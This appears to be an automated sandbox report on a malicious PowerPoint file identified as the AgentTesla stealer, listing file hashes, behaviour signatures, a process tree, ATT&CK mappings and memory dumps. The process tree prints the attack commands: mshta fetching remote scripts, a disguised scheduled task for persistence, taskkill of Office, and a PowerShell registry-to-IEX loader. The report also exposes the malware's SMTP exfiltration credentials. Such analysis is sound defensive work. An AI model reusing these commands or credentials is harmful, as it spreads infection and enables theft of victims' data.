Overview

overview

10

Static

static

8

RFQ No3756368.ppt

windows7_x64

10

RFQ No3756368.ppt

windows10_x64

10

Analysis

  • max time kernel
    119s
  • max time network
    139s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    22-04-2021 07:21

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    RFQ No3756368.ppt

  • Size

    78KB

  • MD5

    4b485ae386bfa68a2eeac2dc35bda606

  • SHA1

    8086ec71e34fd18a1a8e3e20721bc466caf3cda4

  • SHA256

    99b84223a505faa4dcd483e6e925dddfe5a890b41aa92b5e4ef5239a26036075

  • SHA512

    7918aedf847172a8dfed81931ebe5247a627922d5042d6a10799089dd8bb711a1a8f4dc5301e5b65a0f8a27d11f8d815b7d615bb157854a70d1b5a93e8cb09d5

Score
10/10
agentteslakeyloggerpersistencespywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:     smtp
  • Host:
    mail.raceinfo.co.za
  • Port:
    587
  • Username:
    [email protected]
  • Password:
    @ProtimeSport2021

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • AgentTesla Payload 3 IoCs
  • Blocklisted process makes network request 16 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
    persistence
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Kills process with taskkill 2 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 10 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 44 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 53 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\RFQ No3756368.ppt"
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:1776
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1436
      • C:\Windows\SysWOW64\mshta.exe
        mshta http://www.j.mp/asdaksdjqwoddaskdajk
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Adds Run key to start application
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1532
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%[email protected]/p/47.html""\"", 0 : window.close"\")
          3⤵
          • Creates scheduled task(s)
          PID:1612
        • C:\Windows\SysWOW64\taskkill.exe
          "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1992
        • C:\Windows\SysWOW64\taskkill.exe
          "C:\Windows\System32\taskkill.exe" /f /im winword.exe
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:368
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -noexit ((gp HKCU:\Software).MSOFFICELO)|IEX
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:324
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        2⤵
          PID:992
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          2⤵
            PID:1708
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
            2⤵
              PID:1100
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
              2⤵
                PID:2028
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                2⤵
                  PID:920
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                  2⤵
                    PID:852
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                    2⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of SetWindowsHookEx
                    PID:1320

                Network

                MITRE ATT&CK Matrix ATT&CK v6

                Initial Access

                Execution

                Scheduled Task

                1
                T1053

                Persistence

                Registry Run Keys / Startup Folder

                1
                T1060

                Scheduled Task

                1
                T1053

                Privilege Escalation

                Scheduled Task

                1
                T1053

                Defense Evasion

                Modify Registry

                2
                T1112

                Credential Access

                Discovery

                System Information Discovery

                1
                T1082

                Lateral Movement

                Collection

                Exfiltration

                Command and Control

                Impact

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                  MD5

                  66dbecb7cc9a6c923cdcdb694bb9ac2d

                  SHA1

                  8b966764dcd7c76a1de845618dfc9dad318c9793

                  SHA256

                  7bf7e80522731ad55dc0c5abc065e909a859eef377110f3399acf7378cf7d7f9

                  SHA512

                  3238d99459fb0ada9964dfd7f333d592cf7fe0f84e555f9e19f28efdeaa74592a481310205606a5a154c2bcc6e551971be801fa634a071f88c960003898a63a3

                  Download Submit
                • memory/324-78-0x000000001B4B0000-0x000000001B4B1000-memory.dmp
                  Filesize

                  4KB

                  Download
                • memory/324-71-0x000000001A924000-0x000000001A926000-memory.dmp
                  Filesize

                  8KB

                  Download
                • memory/324-81-0x000000001B470000-0x000000001B47D000-memory.dmp
                  Filesize

                  52KB

                  Download
                • memory/324-75-0x0000000002380000-0x0000000002381000-memory.dmp
                  Filesize

                  4KB

                  Download
                • memory/324-72-0x000000001A8F0000-0x000000001A8F1000-memory.dmp
                  Filesize

                  4KB

                  Download
                • memory/324-79-0x000000001C630000-0x000000001C631000-memory.dmp
                  Filesize

                  4KB

                  Download
                • memory/324-70-0x000000001A920000-0x000000001A922000-memory.dmp
                  Filesize

                  8KB

                  Download
                • memory/324-68-0x0000000002590000-0x0000000002591000-memory.dmp
                  Filesize

                  4KB

                  Download
                • memory/324-69-0x000000001A9A0000-0x000000001A9A1000-memory.dmp
                  Filesize

                  4KB

                  Download
                • memory/368-74-0x0000000000000000-mapping.dmp
                  Download
                • memory/1320-84-0x00000000004375FE-mapping.dmp
                  Download
                • memory/1320-85-0x0000000000400000-0x000000000043C000-memory.dmp
                  Filesize

                  240KB

                  Download
                • memory/1320-87-0x0000000004AD0000-0x0000000004AD1000-memory.dmp
                  Filesize

                  4KB

                  Download
                • memory/1320-88-0x0000000004AD1000-0x0000000004AD2000-memory.dmp
                  Filesize

                  4KB

                  Download
                • memory/1320-83-0x0000000000400000-0x000000000043C000-memory.dmp
                  Filesize

                  240KB

                  Download
                • memory/1436-62-0x0000000000000000-mapping.dmp
                  Download
                • memory/1436-63-0x000007FEFBB31000-0x000007FEFBB33000-memory.dmp
                  Filesize

                  8KB

                  Download
                • memory/1532-77-0x0000000003E01000-0x0000000003E02000-memory.dmp
                  Filesize

                  4KB

                  Download
                • memory/1532-76-0x0000000003E01000-0x0000000003E02000-memory.dmp
                  Filesize

                  4KB

                  Download
                • memory/1532-64-0x0000000000000000-mapping.dmp
                  Download
                • memory/1612-67-0x0000000000000000-mapping.dmp
                  Download
                • memory/1776-59-0x00000000740F1000-0x00000000740F5000-memory.dmp
                  Filesize

                  16KB

                  Download
                • memory/1776-60-0x0000000071191000-0x0000000071193000-memory.dmp
                  Filesize

                  8KB

                  Download
                • memory/1776-61-0x000000005FFF0000-0x0000000060000000-memory.dmp
                  Filesize

                  64KB

                  Download
                • memory/1776-65-0x000000005FFF0000-0x0000000060000000-memory.dmp
                  Filesize

                  64KB

                  Download
                • memory/1992-73-0x0000000000000000-mapping.dmp
                  Download